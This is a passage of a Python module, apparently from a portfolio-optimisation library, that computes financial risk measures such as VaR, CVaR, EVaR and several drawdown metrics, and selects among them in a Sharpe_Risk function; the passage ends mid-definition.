\"CVaR_Hist\",\n \"WR\",\n \"LPM\",\n \"Entropic_RM\",\n \"EVaR_Hist\",\n \"MDD_Abs\",\n \"ADD_Abs\",\n \"DaR_Abs\",\n \"CDaR_Abs\",\n \"EDaR_Abs\",\n \"UCI_Abs\",\n \"MDD_Rel\",\n \"ADD_Rel\",\n \"DaR_Rel\",\n \"CDaR_Rel\",\n \"EDaR_Rel\",\n \"UCI_Rel\",\n \"Sharpe_Risk\",\n \"Sharpe\",\n \"Risk_Contribution\",\n]\n\n\ndef MAD(X):\n r\"\"\"\n Calculate the Mean Absolute Deviation (MAD) of a returns series.\n\n .. math::\n \\text{MAD}(X) = \\frac{1}{T}\\sum_{t=1}^{T}\n | X_{t} - \\mathbb{E}(X_{t}) |\n\n Parameters\n ----------\n X : 1d-array\n Returns series, must have Tx1 size.\n\n Returns\n -------\n value : float\n MAD of a returns series.\n\n Raises\n ------\n ValueError\n When the value cannot be calculated.\n\n Examples\n --------\n Examples should be written in doctest format, and should illustrate how\n to use the function.\n\n >>> print([i for i in example_generator(4)])\n [0, 1, 2, 3]\n\n \"\"\"\n\n a = np.array(X, ndmin=2)\n if a.shape[0] == 1 and a.shape[1] > 1:\n a = a.T\n if a.shape[0] > 1 and a.shape[1] > 1:\n raise ValueError(\"returns must have Tx1 size\")\n\n value = np.mean(np.absolute(a - np.mean(a, axis=0)), axis=0)\n value = np.array(value).item()\n\n return value\n\n\ndef SemiDeviation(X):\n r\"\"\"\n Calculate the Semi Deviation of a returns series.\n\n .. math::\n \\text{SemiDev}(X) = \\left [ \\frac{1}{T-1}\\sum_{t=1}^{T}\n (X_{t} - \\mathbb{E}(X_{t}))^2 \\right ]^{1/2}\n\n Parameters\n ----------\n X : 1d-array\n Returns series, must have Tx1 size.\n\n Raises\n ------\n ValueError\n When the value cannot be calculated.\n\n Returns\n -------\n value : float\n Semi Deviation of a returns series.\n \"\"\"\n\n a = np.array(X, ndmin=2)\n if a.shape[0] == 1 and a.shape[1] > 1:\n a = a.T\n if a.shape[0] > 1 and a.shape[1] > 1:\n raise ValueError(\"returns must have Tx1 size\")\n\n mu = np.mean(a, axis=0)\n value = mu - a\n n = value.shape[0]\n value = np.sum(np.power(value[np.where(value >= 0)], 2)) / (n - 1)\n value = np.power(value, 0.5).item()\n\n return value\n\n\ndef VaR_Hist(X, alpha=0.05):\n r\"\"\"\n Calculate the Value at Risk (VaR) of a returns series.\n\n .. 
math::\n \\text{VaR}_{\\alpha}(X) = -\\inf_{t \\in (0,T)} \\left \\{ X_{t} \\in\n \\mathbb{R}: F_{X}(X_{t})>\\alpha \\right \\}\n\n Parameters\n ----------\n X : 1d-array\n Returns series, must have Tx1 size.\n alpha : float, optional\n Significance level of VaR. The default is 0.05.\n Raises\n ------\n ValueError\n When the value cannot be calculated.\n\n Returns\n -------\n value : float\n VaR of a returns series.\n \"\"\"\n\n a = np.array(X, ndmin=2)\n if a.shape[0] == 1 and a.shape[1] > 1:\n a = a.T\n if a.shape[0] > 1 and a.shape[1] > 1:\n raise ValueError(\"returns must have Tx1 size\")\n\n sorted_a = np.sort(a, axis=0)\n index = int(np.ceil(alpha * len(sorted_a)) - 1)\n value = -sorted_a[index]\n value = np.array(value).item()\n\n return value\n\n\ndef CVaR_Hist(X, alpha=0.05):\n r\"\"\"\n Calculate the Conditional Value at Risk (CVaR) of a returns series.\n\n .. math::\n \\text{CVaR}_{\\alpha}(X) = \\text{VaR}_{\\alpha}(X) +\n \\frac{1}{\\alpha T} \\sum_{t=1}^{T} \\max(-X_{t} -\n \\text{VaR}_{\\alpha}(X), 0)\n\n Parameters\n ----------\n X : 1d-array\n Returns series, must have Tx1 size.\n alpha : float, optional\n Significance level of CVaR. The default is 0.05.\n\n Raises\n ------\n ValueError\n When the value cannot be calculated.\n\n Returns\n -------\n value : float\n CVaR of a returns series.\n \"\"\"\n\n a = np.array(X, ndmin=2)\n if a.shape[0] == 1 and a.shape[1] > 1:\n a = a.T\n if a.shape[0] > 1 and a.shape[1] > 1:\n raise ValueError(\"returns must have Tx1 size\")\n\n sorted_a = np.sort(a, axis=0)\n index = int(np.ceil(alpha * len(sorted_a)) - 1)\n sum_var = 0\n for i in range(0, index + 1):\n sum_var = sum_var + sorted_a[i] - sorted_a[index]\n\n value = -sorted_a[index] - sum_var / (alpha * len(sorted_a))\n value = np.array(value).item()\n\n return value\n\n\ndef WR(X):\n r\"\"\"\n Calculate the Worst Realization (WR) or Worst Scenario of a returns series.\n\n .. math::\n \\text{WR}(X) = \\max(-X)\n\n Parameters\n ----------\n X : 1d-array\n Returns series, must have Tx1 size.\n\n Raises\n ------\n ValueError\n When the value cannot be calculated.\n\n Returns\n -------\n value : float\n WR of a returns series.\n\n \"\"\"\n\n a = np.array(X, ndmin=2)\n if a.shape[0] == 1 and a.shape[1] > 1:\n a = a.T\n if a.shape[0] > 1 and a.shape[1] > 1:\n raise ValueError(\"returns must have Tx1 size\")\n\n sorted_a = np.sort(a, axis=0)\n value = -sorted_a[0]\n value = np.array(value).item()\n\n return value\n\n\ndef LPM(X, MAR=0, p=1):\n r\"\"\"\n Calculate the First or Second Lower Partial Moment of a returns series.\n\n .. math::\n \\text{LPM}(X, \\text{MAR}, 1) &= \\frac{1}{T}\\sum_{t=1}^{T}\n \\max(\\text{MAR} - X_{t}, 0) \\\\\n \\text{LPM}(X, \\text{MAR}, 2) &= \\left [ \\frac{1}{T-1}\\sum_{t=1}^{T}\n \\max(\\text{MAR} - X_{t}, 0)^{2} \\right ]^{\\frac{1}{2}} \\\\\n\n\n Where:\n\n :math:`\\text{MAR}` is the minimum acceptable return.\n :math:`p` is the order of the :math:`\\text{LPM}`.\n\n Parameters\n ----------\n X : 1d-array\n Returns series, must have Tx1 size.\n MAR : float, optional\n Minimum acceptable return. The default is 0.\n p : float, optional can be {1,2} \n order of the :math:`\\text{LPM}`. 
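# --- Hedged example -------------------------------------------------------
# A compact numeric sketch of historical VaR and CVaR as defined above:
# sort the returns, take the ceil(alpha*T)-th worst observation for VaR,
# and (with alpha*T integral here) average the alpha-tail for CVaR, which
# matches the CVaR_Hist recipe. The sample returns are hypothetical.
import numpy as np

alpha = 0.05
returns = np.random.default_rng(0).normal(0.0005, 0.01, size=1000)

sorted_r = np.sort(returns)
index = int(np.ceil(alpha * len(sorted_r)) - 1)
var = -sorted_r[index]
cvar = -np.mean(sorted_r[: index + 1])   # mean of the alpha-tail, sign-flipped
print(round(var, 4), round(cvar, 4))     # CVaR >= VaR by construction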
The default is 1.\n\n Raises\n ------\n ValueError\n When the value cannot be calculated.\n\n Returns\n -------\n value : float\n p-th Lower Partial Moment of a returns series.\n\n \"\"\"\n\n a = np.array(X, ndmin=2)\n if a.shape[0] == 1 and a.shape[1] > 1:\n a = a.T\n if a.shape[0] > 1 and a.shape[1] > 1:\n raise ValueError(\"returns must have Tx1 size\")\n if p not in [1, 2]:\n raise ValueError(\"p can only be 1 or 2\")\n\n value = MAR - a\n\n if p == 2:\n n = value.shape[0] - 1\n else:\n n = value.shape[0]\n\n value = np.sum(np.power(value[np.where(value >= 0)], p)) / n\n value = np.power(value, 1 / p).item()\n\n return value\n\n\ndef Entropic_RM(X, z=1, alpha=0.05):\n r\"\"\"\n Calculate the Entropic Risk Measure (ERM) of a returns series.\n\n .. math::\n \\text{ERM}_{\\alpha}(X) = z\\ln \\left (\\frac{M_X(z^{-1})}{\\alpha} \\right )\n\n Where:\n\n :math:`M_X(z)` is the moment generating function of X.\n\n Parameters\n ----------\n X : 1d-array\n Returns series, must have Tx1 size.\n theta : float, optional\n Risk aversion parameter, must be greater than zero. The default is 1.\n alpha : float, optional\n Significance level of EVaR. The default is 0.05.\n\n Raises\n ------\n ValueError\n When the value cannot be calculated.\n\n Returns\n -------\n value : float\n ERM of a returns series.\n\n \"\"\"\n\n a = np.array(X, ndmin=2)\n if a.shape[0] == 1 and a.shape[1] > 1:\n a = a.T\n if a.shape[0] > 1 and a.shape[1] > 1:\n raise ValueError(\"returns must have Tx1 size\")\n\n value = np.mean(np.exp(-1 / z * a), axis=0)\n value = z * (np.log(value) + np.log(1 / alpha))\n value = np.array(value).item()\n\n return value\n\n\ndef _Entropic_RM(z, X, alpha=0.05):\n a = np.array(X, ndmin=2)\n if a.shape[0] == 1 and a.shape[1] > 1:\n a = a.T\n if a.shape[0] > 1 and a.shape[1] > 1:\n raise ValueError(\"returns must have Tx1 size\")\n\n value = np.mean(np.exp(-1 / z * a), axis=0)\n value = z * (np.log(value) + np.log(1 / alpha))\n value = np.array(value).item()\n\n return value\n\n\ndef EVaR_Hist(X, alpha=0.05):\n r\"\"\"\n Calculate the Entropic Value at Risk (EVaR) of a returns series.\n\n .. math::\n \\text{EVaR}_{\\alpha}(X) = \\inf_{z>0} \\left \\{ z\n \\ln \\left (\\frac{M_X(z^{-1})}{\\alpha} \\right ) \\right \\}\n\n Where:\n\n :math:`M_X(t)` is the moment generating function of X.\n\n Parameters\n ----------\n X : 1d-array\n Returns series, must have Tx1 size.\n alpha : float, optional\n Significance level of EVaR. The default is 0.05.\n\n Raises\n ------\n ValueError\n When the value cannot be calculated.\n\n Returns\n -------\n (value, z) : tuple\n EVaR of a returns series and value of z that minimize EVaR.\n\n \"\"\"\n\n a = np.array(X, ndmin=2)\n if a.shape[0] == 1 and a.shape[1] > 1:\n a = a.T\n if a.shape[0] > 1 and a.shape[1] > 1:\n raise ValueError(\"returns must have Tx1 size\")\n\n bnd = Bounds([1e-12], [np.inf])\n result = minimize(\n _Entropic_RM, [1], args=(X, alpha), method=\"SLSQP\", bounds=bnd, tol=1e-12\n )\n t = result.x\n t = t.item()\n value = _Entropic_RM(t, X, alpha)\n return (value, t)\n\n\ndef MDD_Abs(X):\n r\"\"\"\n Calculate the Maximum Drawdown (MDD) of a returns series\n using uncumpounded cumulative returns.\n\n .. 
math::\n \\text{MDD}(X) = \\max_{j \\in (0,T)} \\left [\\max_{t \\in (0,j)}\n \\left ( \\sum_{i=0}^{t}X_{i} \\right ) - \\sum_{i=0}^{j}X_{i} \\right ]\n\n Parameters\n ----------\n X : 1d-array\n Returns series, must have Tx1 size.\n\n Raises\n ------\n ValueError\n When the value cannot be calculated.\n\n Returns\n -------\n value : float\n MDD of an uncumpounded cumulative returns.\n\n \"\"\"\n\n a = np.array(X, ndmin=2)\n if a.shape[0] == 1 and a.shape[1] > 1:\n a = a.T\n if a.shape[0] > 1 and a.shape[1] > 1:\n raise ValueError(\"returns must have Tx1 size\")\n\n prices = np.insert(np.array(a), 0, 1, axis=0)\n NAV = np.cumsum(np.array(prices), axis=0)\n value = 0\n peak = -99999\n for i in NAV:\n if i > peak:\n peak = i\n DD = peak - i\n if DD > value:\n value = DD\n\n value = np.array(value).item()\n\n return value\n\n\ndef ADD_Abs(X):\n r\"\"\"\n Calculate the Average Drawdown (ADD) of a returns series\n using uncumpounded cumulative returns.\n\n .. math::\n \\text{ADD}(X) = \\frac{1}{T}\\sum_{j=0}^{T}\\left [ \\max_{t \\in (0,j)}\n \\left ( \\sum_{i=0}^{t}X_{i} \\right ) - \\sum_{i=0}^{j}X_{i} \\right ]\n\n Parameters\n ----------\n X : 1d-array\n Returns series, must have Tx1 size.\n\n Raises\n ------\n ValueError\n When the value cannot be calculated.\n\n Returns\n -------\n value : float\n ADD of an uncumpounded cumulative returns.\n\n \"\"\"\n\n a = np.array(X, ndmin=2)\n if a.shape[0] == 1 and a.shape[1] > 1:\n a = a.T\n if a.shape[0] > 1 and a.shape[1] > 1:\n raise ValueError(\"returns must have Tx1 size\")\n\n prices = np.insert(np.array(a), 0, 1, axis=0)\n NAV = np.cumsum(np.array(prices), axis=0)\n value = 0\n peak = -99999\n n = 0\n for i in NAV:\n if i > peak:\n peak = i\n DD = peak - i\n if DD > 0:\n value += DD\n n += 1\n if n == 0:\n value = 0\n else:\n value = value / (n - 1)\n\n value = np.array(value).item()\n\n return value\n\n\ndef DaR_Abs(X, alpha=0.05):\n r\"\"\"\n Calculate the Drawdown at Risk (DaR) of a returns series\n using uncumpounded cumulative returns.\n\n .. math::\n \\text{DaR}_{\\alpha}(X) & = \\max_{j \\in (0,T)} \\left \\{ \\text{DD}(X,j)\n \\in \\mathbb{R}: F_{\\text{DD}} \\left ( \\text{DD}(X,j) \\right )< 1-\\alpha\n \\right \\} \\\\\n \\text{DD}(X,j) & = \\max_{t \\in (0,j)} \\left ( \\sum_{i=0}^{t}X_{i}\n \\right )- \\sum_{i=0}^{j}X_{i}\n\n Parameters\n ----------\n X : 1d-array\n Returns series, must have Tx1 size..\n alpha : float, optional\n Significance level of DaR. The default is 0.05.\n\n Raises\n ------\n ValueError\n When the value cannot be calculated.\n\n Returns\n -------\n value : float\n DaR of an uncumpounded cumulative returns series.\n\n \"\"\"\n\n a = np.array(X, ndmin=2)\n if a.shape[0] == 1 and a.shape[1] > 1:\n a = a.T\n if a.shape[0] > 1 and a.shape[1] > 1:\n raise ValueError(\"returns must have Tx1 size\")\n\n prices = np.insert(np.array(a), 0, 1, axis=0)\n NAV = np.cumsum(np.array(prices), axis=0)\n DD = []\n peak = -99999\n for i in NAV:\n if i > peak:\n peak = i\n DD.append(-(peak - i))\n del DD[0]\n sorted_DD = np.sort(np.array(DD), axis=0)\n index = int(np.ceil(alpha * len(sorted_DD)) - 1)\n value = -sorted_DD[index]\n value = np.array(value).item()\n\n return value\n\n\ndef CDaR_Abs(X, alpha=0.05):\n r\"\"\"\n Calculate the Conditional Drawdown at Risk (CDaR) of a returns series\n using uncumpounded cumulative returns.\n\n .. 
math::\n \\text{CDaR}_{\\alpha}(X) = \\text{DaR}_{\\alpha}(X) + \\frac{1}{\\alpha T}\n \\sum_{j=0}^{T} \\max \\left [ \\max_{t \\in (0,j)}\n \\left ( \\sum_{i=0}^{t}X_{i} \\right ) - \\sum_{i=0}^{j}X_{i}\n - \\text{DaR}_{\\alpha}(X), 0 \\right ]\n\n Where:\n\n :math:`\\text{DaR}_{\\alpha}` is the Drawdown at Risk of an uncumpound\n cumulated return series :math:`X`.\n\n Parameters\n ----------\n X : 1d-array\n Returns series, must have Tx1 size..\n alpha : float, optional\n Significance level of CDaR. The default is 0.05.\n\n Raises\n ------\n ValueError\n When the value cannot be calculated.\n\n Returns\n -------\n value : float\n CDaR of an uncumpounded cumulative returns series.\n\n \"\"\"\n\n a = np.array(X, ndmin=2)\n if a.shape[0] == 1 and a.shape[1] > 1:\n a = a.T\n if a.shape[0] > 1 and a.shape[1] > 1:\n raise ValueError(\"returns must have Tx1 size\")\n\n prices = np.insert(np.array(a), 0, 1, axis=0)\n NAV = np.cumsum(np.array(prices), axis=0)\n DD = []\n peak = -99999\n for i in NAV:\n if i > peak:\n peak = i\n DD.append(-(peak - i))\n del DD[0]\n sorted_DD = np.sort(np.array(DD), axis=0)\n index = int(np.ceil(alpha * len(sorted_DD)) - 1)\n sum_var = 0\n for i in range(0, index + 1):\n sum_var = sum_var + sorted_DD[i] - sorted_DD[index]\n value = -sorted_DD[index] - sum_var / (alpha * len(sorted_DD))\n value = np.array(value).item()\n\n return value\n\n\ndef EDaR_Abs(X, alpha=0.05):\n r\"\"\"\n Calculate the Entropic Drawdown at Risk (EDaR) of a returns series\n using uncumpounded cumulative returns.\n\n .. math::\n \\text{EDaR}_{\\alpha}(X) & = \\inf_{z>0} \\left \\{ z\n \\ln \\left (\\frac{M_{\\text{DD}(X)}(z^{-1})}{\\alpha} \\right ) \\right \\} \\\\\n \\text{DD}(X,j) & = \\max_{t \\in (0,j)} \\left ( \\sum_{i=0}^{t}X_{i}\n \\right )- \\sum_{i=0}^{j}X_{i} \\\\\n\n Parameters\n ----------\n X : 1d-array\n Returns series, must have Tx1 size..\n alpha : float, optional\n Significance level of EDaR. The default is 0.05.\n\n Raises\n ------\n ValueError\n When the value cannot be calculated.\n\n Returns\n -------\n (value, z) : tuple\n EDaR of an uncumpounded cumulative returns series \n and value of z that minimize EDaR.\n \n \"\"\"\n\n a = np.array(X, ndmin=2)\n if a.shape[0] == 1 and a.shape[1] > 1:\n a = a.T\n if a.shape[0] > 1 and a.shape[1] > 1:\n raise ValueError(\"returns must have Tx1 size\")\n\n prices = np.insert(np.array(a), 0, 1, axis=0)\n NAV = np.cumsum(np.array(prices), axis=0)\n DD = []\n peak = -99999\n for i in NAV:\n if i > peak:\n peak = i\n DD.append(-(peak - i))\n del DD[0]\n\n (value, t) = EVaR_Hist(np.array(DD), alpha=alpha)\n\n return (value, t)\n\n\ndef UCI_Abs(X):\n r\"\"\"\n Calculate the Ulcer Index (UCI) of a returns series\n using uncumpounded cumulative returns.\n\n .. 
math::\n \\text{UCI}(X) =\\sqrt{\\frac{1}{T}\\sum_{j=0}^{T} \\left [ \\max_{t \\in\n (0,j)} \\left ( \\sum_{i=0}^{t}X_{i} \\right ) - \\sum_{i=0}^{j}X_{i}\n \\right ] ^2}\n\n Parameters\n ----------\n X : 1d-array\n Returns series, must have Tx1 size.\n\n Raises\n ------\n ValueError\n When the value cannot be calculated.\n\n Returns\n -------\n value : float\n Ulcer Index of an uncumpounded cumulative returns.\n\n \"\"\"\n\n a = np.array(X, ndmin=2)\n if a.shape[0] == 1 and a.shape[1] > 1:\n a = a.T\n if a.shape[0] > 1 and a.shape[1] > 1:\n raise ValueError(\"returns must have Tx1 size\")\n\n prices = np.insert(np.array(a), 0, 1, axis=0)\n NAV = np.cumsum(np.array(prices), axis=0)\n value = 0\n peak = -99999\n n = 0\n for i in NAV:\n if i > peak:\n peak = i\n DD = peak - i\n if DD > 0:\n value += DD ** 2\n n += 1\n if n == 0:\n value = 0\n else:\n value = np.sqrt(value / (n - 1))\n\n value = np.array(value).item()\n\n return value\n\n\ndef MDD_Rel(X):\n r\"\"\"\n Calculate the Maximum Drawdown (MDD) of a returns series\n using cumpounded cumulative returns.\n\n .. math::\n \\text{MDD}(X) = \\max_{j \\in (0,T)}\\left[\\max_{t \\in (0,j)}\n \\left ( \\prod_{i=0}^{t}(1+X_{i}) \\right ) - \\prod_{i=0}^{j}(1+X_{i})\n \\right]\n\n Parameters\n ----------\n X : 1d-array\n Returns series, must have Tx1 size.\n\n Raises\n ------\n ValueError\n When the value cannot be calculated.\n\n Returns\n -------\n value : float\n MDD of a cumpounded cumulative returns.\n\n \"\"\"\n\n a = np.array(X, ndmin=2)\n if a.shape[0] == 1 and a.shape[1] > 1:\n a = a.T\n if a.shape[0] > 1 and a.shape[1] > 1:\n raise ValueError(\"returns must have Tx1 size\")\n\n prices = 1 + np.insert(np.array(a), 0, 0, axis=0)\n NAV = np.cumprod(prices, axis=0)\n value = 0\n peak = -99999\n for i in NAV:\n if i > peak:\n peak = i\n DD = (peak - i) / peak\n if DD > value:\n value = DD\n\n value = np.array(value).item()\n\n return value\n\n\ndef ADD_Rel(X):\n r\"\"\"\n Calculate the Average Drawdown (ADD) of a returns series\n using cumpounded cumulative returns.\n\n .. math::\n \\text{ADD}(X) = \\frac{1}{T}\\sum_{j=0}^{T} \\left [ \\max_{t \\in (0,j)}\n \\left ( \\prod_{i=0}^{t}(1+X_{i}) \\right )- \\prod_{i=0}^{j}(1+X_{i})\n \\right ]\n\n Parameters\n ----------\n X : 1d-array\n Returns series, must have Tx1 size.\n\n Raises\n ------\n ValueError\n When the value cannot be calculated.\n\n Returns\n -------\n value : float\n ADD of a cumpounded cumulative returns.\n\n \"\"\"\n\n a = np.array(X, ndmin=2)\n if a.shape[0] == 1 and a.shape[1] > 1:\n a = a.T\n if a.shape[0] > 1 and a.shape[1] > 1:\n raise ValueError(\"returns must have Tx1 size\")\n\n prices = 1 + np.insert(np.array(a), 0, 0, axis=0)\n NAV = np.cumprod(prices, axis=0)\n value = 0\n peak = -99999\n n = 0\n for i in NAV:\n if i > peak:\n peak = i\n DD = (peak - i) / peak\n if DD > 0:\n value += DD\n n += 1\n if n == 0:\n value = 0\n else:\n value = value / (n - 1)\n\n value = np.array(value).item()\n\n return value\n\n\ndef DaR_Rel(X, alpha=0.05):\n r\"\"\"\n Calculate the Drawdown at Risk (DaR) of a returns series\n using cumpounded cumulative returns.\n\n .. 
math::\n \\text{DaR}_{\\alpha}(X) & = \\max_{j \\in (0,T)} \\left \\{ \\text{DD}(X,j)\n \\in \\mathbb{R}: F_{\\text{DD}} \\left ( \\text{DD}(X,j) \\right )< 1 - \\alpha\n \\right \\} \\\\\n \\text{DD}(X,j) & = \\max_{t \\in (0,j)} \\left ( \\prod_{i=0}^{t}(1+X_{i})\n \\right )- \\prod_{i=0}^{j}(1+X_{i})\n\n Parameters\n ----------\n X : 1d-array\n Returns series, must have Tx1 size..\n alpha : float, optional\n Significance level of DaR. The default is 0.05.\n\n Raises\n ------\n ValueError\n When the value cannot be calculated.\n\n Returns\n -------\n value : float\n DaR of a cumpounded cumulative returns series.\n\n \"\"\"\n\n a = np.array(X, ndmin=2)\n if a.shape[0] == 1 and a.shape[1] > 1:\n a = a.T\n if a.shape[0] > 1 and a.shape[1] > 1:\n raise ValueError(\"X must have Tx1 size\")\n\n prices = 1 + np.insert(np.array(a), 0, 0, axis=0)\n NAV = np.cumprod(prices, axis=0)\n DD = []\n peak = -99999\n for i in NAV:\n if i > peak:\n peak = i\n DD.append(-(peak - i) / peak)\n del DD[0]\n sorted_DD = np.sort(np.array(DD), axis=0)\n index = int(np.ceil(alpha * len(sorted_DD)) - 1)\n value = -sorted_DD[index]\n value = np.array(value).item()\n\n return value\n\n\ndef CDaR_Rel(X, alpha=0.05):\n r\"\"\"\n Calculate the Conditional Drawdown at Risk (CDaR) of a returns series\n using cumpounded cumulative returns.\n\n .. math::\n \\text{CDaR}_{\\alpha}(X) = \\text{DaR}_{\\alpha}(X) + \\frac{1}{\\alpha T}\n \\sum_{i=0}^{T} \\max \\left [ \\max_{t \\in (0,T)}\n \\left ( \\prod_{i=0}^{t}(1+X_{i}) \\right )- \\prod_{i=0}^{j}(1+X_{i})\n - \\text{DaR}_{\\alpha}(X), 0 \\right ]\n\n Where:\n\n :math:`\\text{DaR}_{\\alpha}` is the Drawdown at Risk of a cumpound\n cumulated return series :math:`X`.\n\n Parameters\n ----------\n X : 1d-array\n Returns series, must have Tx1 size..\n alpha : float, optional\n Significance level of CDaR. The default is 0.05.\n\n Raises\n ------\n ValueError\n When the value cannot be calculated.\n\n Returns\n -------\n value : float\n CDaR of a cumpounded cumulative returns series.\n\n \"\"\"\n\n a = np.array(X, ndmin=2)\n if a.shape[0] == 1 and a.shape[1] > 1:\n a = a.T\n if a.shape[0] > 1 and a.shape[1] > 1:\n raise ValueError(\"X must have Tx1 size\")\n\n prices = 1 + np.insert(np.array(a), 0, 0, axis=0)\n NAV = np.cumprod(prices, axis=0)\n DD = []\n peak = -99999\n for i in NAV:\n if i > peak:\n peak = i\n DD.append(-(peak - i) / peak)\n del DD[0]\n sorted_DD = np.sort(np.array(DD), axis=0)\n index = int(np.ceil(alpha * len(sorted_DD)) - 1)\n sum_var = 0\n for i in range(0, index + 1):\n sum_var = sum_var + sorted_DD[i] - sorted_DD[index]\n value = -sorted_DD[index] - sum_var / (alpha * len(sorted_DD))\n value = np.array(value).item()\n\n return value\n\n\ndef EDaR_Rel(X, alpha=0.05):\n r\"\"\"\n Calculate the Entropic Drawdown at Risk (EDaR) of a returns series\n using cumpounded cumulative returns.\n\n .. math::\n \\text{EDaR}_{\\alpha}(X) & = \\inf_{z>0} \\left \\{ z\n \\ln \\left (\\frac{M_{\\text{DD}(X)}(z^{-1})}{\\alpha} \\right ) \\right \\} \\\\\n \\text{DD}(X,j) & = \\max_{t \\in (0,j)} \\left ( \\prod_{i=0}^{t}(1+X_{i})\n \\right )- \\prod_{i=0}^{j}(1+X_{i})\n\n Parameters\n ----------\n X : 1d-array\n Returns series, must have Tx1 size..\n alpha : float, optional\n Significance level of EDaR. 
The default is 0.05.\n\n Raises\n ------\n ValueError\n When the value cannot be calculated.\n\n Returns\n -------\n (value, z) : tuple\n EDaR of a cumpounded cumulative returns series \n and value of z that minimize EDaR.\n\n \"\"\"\n\n a = np.array(X, ndmin=2)\n if a.shape[0] == 1 and a.shape[1] > 1:\n a = a.T\n if a.shape[0] > 1 and a.shape[1] > 1:\n raise ValueError(\"X must have Tx1 size\")\n\n prices = 1 + np.insert(np.array(a), 0, 0, axis=0)\n NAV = np.cumprod(prices, axis=0)\n DD = []\n peak = -99999\n for i in NAV:\n if i > peak:\n peak = i\n DD.append(-(peak - i) / peak)\n del DD[0]\n\n (value, t) = EVaR_Hist(np.array(DD), alpha=alpha)\n\n return (value, t)\n\n\ndef UCI_Rel(X):\n r\"\"\"\n Calculate the Ulcer Index (UCI) of a returns series\n using cumpounded cumulative returns.\n\n .. math::\n \\text{UCI}(X) =\\sqrt{\\frac{1}{T}\\sum_{j=0}^{T} \\left [ \\max_{t \\in\n (0,j)} \\left ( \\prod_{i=0}^{t}(1+X_{i}) \\right )- \\prod_{i=0}^{j}\n (1+X_{i}) \\right ] ^2}\n\n Parameters\n ----------\n X : 1d-array\n Returns series, must have Tx1 size.\n\n Raises\n ------\n ValueError\n When the value cannot be calculated.\n\n Returns\n -------\n value : float\n Ulcer Index of a cumpounded cumulative returns.\n\n \"\"\"\n\n a = np.array(X, ndmin=2)\n if a.shape[0] == 1 and a.shape[1] > 1:\n a = a.T\n if a.shape[0] > 1 and a.shape[1] > 1:\n raise ValueError(\"returns must have Tx1 size\")\n\n prices = 1 + np.insert(np.array(a), 0, 0, axis=0)\n NAV = np.cumprod(prices, axis=0)\n value = 0\n peak = -99999\n n = 0\n for i in NAV:\n if i > peak:\n peak = i\n DD = (peak - i) / peak\n if DD > 0:\n value += DD ** 2\n n += 1\n if n == 0:\n value = 0\n else:\n value = np.sqrt(value / (n - 1))\n\n value = np.array(value).item()\n\n return value\n\n\n###############################################################################\n# Risk Adjusted Return Ratios\n###############################################################################\n\n\ndef Sharpe_Risk(w, cov=None, returns=None, rm=\"MV\", rf=0, alpha=0.05):\n r\"\"\"\n Calculate the risk measure available on the Sharpe function.\n\n Parameters\n ----------\n w : DataFrame or 1d-array of shape (n_assets, 1)\n Weights matrix, where n_assets is the number of assets.\n cov : DataFrame or nd-array of shape (n_features, n_features)\n Covariance matrix, where n_features is the number of features.\n returns : DataFrame or nd-array of shape (n_samples, n_features)\n Features matrix, where n_samples is the number of samples and\n n_features is the number of features.\n rm : str, optional\n Risk measure used in the denominator of the ratio. The default is\n 'MV'. 
Posible values are:\n\n - 'MV': Standard Deviation.\n - 'MAD': Mean Absolute Deviation.\n - 'MSV': Semi Standard Deviation.\n - 'FLPM': First Lower Partial Moment (Omega Ratio).\n - 'SLPM': Second Lower Partial Moment (Sortino Ratio).\n - 'VaR': Value at Risk.\n - 'CVaR': Conditional Value at Risk.\n - 'EVaR': Entropic Value at Risk.\n - 'WR': Worst Realization (Minimax)\n - 'MDD': Maximum Drawdown of uncompounded cumulative returns (Calmar Ratio).\n - 'ADD': Average Drawdown of uncompounded cumulative returns.\n - 'DaR': Drawdown at Risk of uncompounded cumulative returns.\n - 'CDaR': Conditional Drawdown at Risk of uncompounded cumulative returns.\n - 'EDaR': Entropic Drawdown at Risk of uncompounded cumulative returns.\n - 'UCI': Ulcer Index of uncompounded cumulative returns.\n - 'MDD_Rel': Maximum Drawdown of compounded cumulative returns (Calmar Ratio).\n - 'ADD_Rel': Average Drawdown of compounded cumulative returns.\n - 'CDaR_Rel': Conditional Drawdown at Risk of compounded cumulative returns.\n - 'EDaR_Rel': Entropic Drawdown at Risk of compounded cumulative returns.\n - 'UCI_Rel': Ulcer Index of compounded cumulative returns.\n\n rf : float, optional\n Risk free rate. The default is 0.\n alpha : float, optional\n Significance level of VaR, CVaR, EDaR, DaR, CDaR and EDaR.\n The default is 0.05.\n\n Raises\n ------\n ValueError\n When the value cannot be calculated.\n\n Returns\n -------\n value : float\n Risk measure of the portfolio.\n\n \"\"\"\n\n w_ = np.array(w, ndmin=2)\n if w_.shape[0] == 1 and w_.shape[1] > 1:\n w_ = w_.T\n if w_.shape[0] > 1 and w_.shape[1] > 1:\n raise ValueError(\"weights must have n_assets x 1 size\")\n\n if cov is not None:\n cov_ = np.array(cov, ndmin=2)\n if returns is not None:\n returns_ = np.array(returns, ndmin=2)\n\n a = returns_ @ w_\n if rm == \"MV\":\n risk = w_.T @ cov_ @ w_\n risk = np.sqrt(risk.item())\n elif rm == \"MAD\":\n risk = MAD(a)\n elif rm == \"MSV\":\n risk = SemiDeviation(a)\n elif rm == \"FLPM\":\n risk = LPM(a, MAR=rf, p=1)\n elif rm == \"SLPM\":\n risk = LPM(a, MAR=rf, p=2)\n elif rm == \"VaR\":\n risk = VaR_Hist(a, alpha=alpha)\n elif rm == \"CVaR\":\n risk = CVaR_Hist(a, alpha=alpha)\n elif rm == \"EVaR\":\n risk = EVaR_Hist(a, alpha=alpha)[0]\n elif rm == \"WR\":\n risk = WR(a)\n elif rm == \"MDD\":\n risk = MDD_Abs(a)\n elif rm == \"ADD\":\n risk = ADD_Abs(a)\n elif rm == \"DaR\":\n risk = DaR_Abs(a, alpha=alpha)\n elif rm == \"CDaR\":\n risk = CDaR_Abs(a, alpha=alpha)\n elif rm == \"EDaR\":\n risk = EDaR_Abs(a, alpha=alpha)[0]\n elif rm == \"UCI\":\n risk = UCI_Abs(a)\n elif rm == \"MDD_Rel\":\n risk = MDD_Rel(a)\n elif rm == \"ADD_Rel\":\n risk = ADD_Rel(a)\n elif rm == \"DaR_Rel\":\n risk = DaR_Rel(a, alpha=alpha)\n elif rm == \"CDaR_Rel\":\n risk = CDaR_Rel(a, alpha=alpha)\n elif rm == \"EDaR_Rel\":\n risk = EDaR_Rel(a, alpha=alpha)[0]\n elif rm == \"UCI_Rel\":\n risk = UCI_Rel(a)\n value = risk\n\n return value\n\n\ndef 